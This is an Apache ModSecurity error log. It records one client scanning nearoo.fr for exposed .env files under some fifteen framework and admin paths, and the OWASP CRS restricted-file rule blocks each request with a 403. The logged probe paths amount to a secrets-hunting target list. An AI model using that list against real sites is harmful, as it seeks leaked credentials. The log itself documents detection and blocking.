[Mon May 11 17:36:18.016559 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/admin-panel/.env"] [unique_id "agH3clV4kyjgo4bQBUhuZgAAANM"]
[Mon May 11 17:36:18.222730 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /control-panel/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/control-panel/.env"] [unique_id "agH3clV4kyjgo4bQBUhuZwAAANM"]
[Mon May 11 17:36:18.223023 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/control-panel/.env"] [unique_id "agH3clV4kyjgo4bQBUhuZwAAANM"]
[Mon May 11 17:36:18.223292 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/control-panel/.env"] [unique_id "agH3clV4kyjgo4bQBUhuZwAAANM"]
[Mon May 11 17:36:18.458572 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /user-panel/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/user-panel/.env"] [unique_id "agH3clV4kyjgo4bQBUhuaQAAANM"]
[Mon May 11 17:36:18.458800 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/user-panel/.env"] [unique_id "agH3clV4kyjgo4bQBUhuaQAAANM"]
[Mon May 11 17:36:18.459088 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/user-panel/.env"] [unique_id "agH3clV4kyjgo4bQBUhuaQAAANM"]
[Mon May 11 17:36:18.698478 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /node/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/node/.env"] [unique_id "agH3clV4kyjgo4bQBUhuagAAANM"]
[Mon May 11 17:36:18.698706 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/node/.env"] [unique_id "agH3clV4kyjgo4bQBUhuagAAANM"]
[Mon May 11 17:36:18.698937 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/node/.env"] [unique_id "agH3clV4kyjgo4bQBUhuagAAANM"]
[Mon May 11 17:36:19.112448 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /express/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/express/.env"] [unique_id "agH3c1V4kyjgo4bQBUhubAAAANM"]
[Mon May 11 17:36:19.112683 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/express/.env"] [unique_id "agH3c1V4kyjgo4bQBUhubAAAANM"]
[Mon May 11 17:36:19.112925 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/express/.env"] [unique_id "agH3c1V4kyjgo4bQBUhubAAAANM"]
[Mon May 11 17:36:19.357813 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /next/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/next/.env"] [unique_id "agH3c1V4kyjgo4bQBUhubQAAANM"]
[Mon May 11 17:36:19.358145 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/next/.env"] [unique_id "agH3c1V4kyjgo4bQBUhubQAAANM"]
[Mon May 11 17:36:19.358521 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/next/.env"] [unique_id "agH3c1V4kyjgo4bQBUhubQAAANM"]
[Mon May 11 17:36:19.730718 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /nuxt/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/nuxt/.env"] [unique_id "agH3c1V4kyjgo4bQBUhubgAAANM"]
[Mon May 11 17:36:19.730952 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/nuxt/.env"] [unique_id "agH3c1V4kyjgo4bQBUhubgAAANM"]
[Mon May 11 17:36:19.731209 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/nuxt/.env"] [unique_id "agH3c1V4kyjgo4bQBUhubgAAANM"]
[Mon May 11 17:36:19.987423 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /nest/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/nest/.env"] [unique_id "agH3c1V4kyjgo4bQBUhubwAAANM"]
[Mon May 11 17:36:19.987662 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/nest/.env"] [unique_id "agH3c1V4kyjgo4bQBUhubwAAANM"]
[Mon May 11 17:36:19.987992 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/nest/.env"] [unique_id "agH3c1V4kyjgo4bQBUhubwAAANM"]
[Mon May 11 17:36:20.234037 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /react/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/react/.env"] [unique_id "agH3dFV4kyjgo4bQBUhucAAAANM"]
[Mon May 11 17:36:20.234340 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/react/.env"] [unique_id "agH3dFV4kyjgo4bQBUhucAAAANM"]
[Mon May 11 17:36:20.234607 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/react/.env"] [unique_id "agH3dFV4kyjgo4bQBUhucAAAANM"]
[Mon May 11 17:36:20.404433 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /vue/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/vue/.env"] [unique_id "agH3dFV4kyjgo4bQBUhucgAAANM"]
[Mon May 11 17:36:20.404660 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/vue/.env"] [unique_id "agH3dFV4kyjgo4bQBUhucgAAANM"]
[Mon May 11 17:36:20.404912 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/vue/.env"] [unique_id "agH3dFV4kyjgo4bQBUhucgAAANM"]
[Mon May 11 17:36:20.570485 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /angular/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/angular/.env"] [unique_id "agH3dFV4kyjgo4bQBUhucwAAANM"]
[Mon May 11 17:36:20.570712 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/angular/.env"] [unique_id "agH3dFV4kyjgo4bQBUhucwAAANM"]
[Mon May 11 17:36:20.570958 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/angular/.env"] [unique_id "agH3dFV4kyjgo4bQBUhucwAAANM"]
[Mon May 11 17:36:20.766025 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /svelte/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/svelte/.env"] [unique_id "agH3dFV4kyjgo4bQBUhudQAAANM"]
[Mon May 11 17:36:20.766254 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/svelte/.env"] [unique_id "agH3dFV4kyjgo4bQBUhudQAAANM"]
[Mon May 11 17:36:20.766496 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/svelte/.env"] [unique_id "agH3dFV4kyjgo4bQBUhudQAAANM"]
[Mon May 11 17:36:20.965859 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /vite/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/vite/.env"] [unique_id "agH3dFV4kyjgo4bQBUhudgAAANM"]
[Mon May 11 17:36:20.966085 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/vite/.env"] [unique_id "agH3dFV4kyjgo4bQBUhudgAAANM"]
[Mon May 11 17:36:20.966406 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/vite/.env"] [unique_id "agH3dFV4kyjgo4bQBUhudgAAANM"]
[Mon May 11 17:36:21.202955 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /backup/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/backup/.env"] [unique_id "agH3dVV4kyjgo4bQBUhudwAAANM"]
[Mon May 11 17:36:21.203213 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/backup/.env"] [unique_id "agH3dVV4kyjgo4bQBUhudwAAANM"]
[Mon May 11 17:36:21.203470 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/backup/.env"] [unique_id "agH3dVV4kyjgo4bQBUhudwAAANM"]
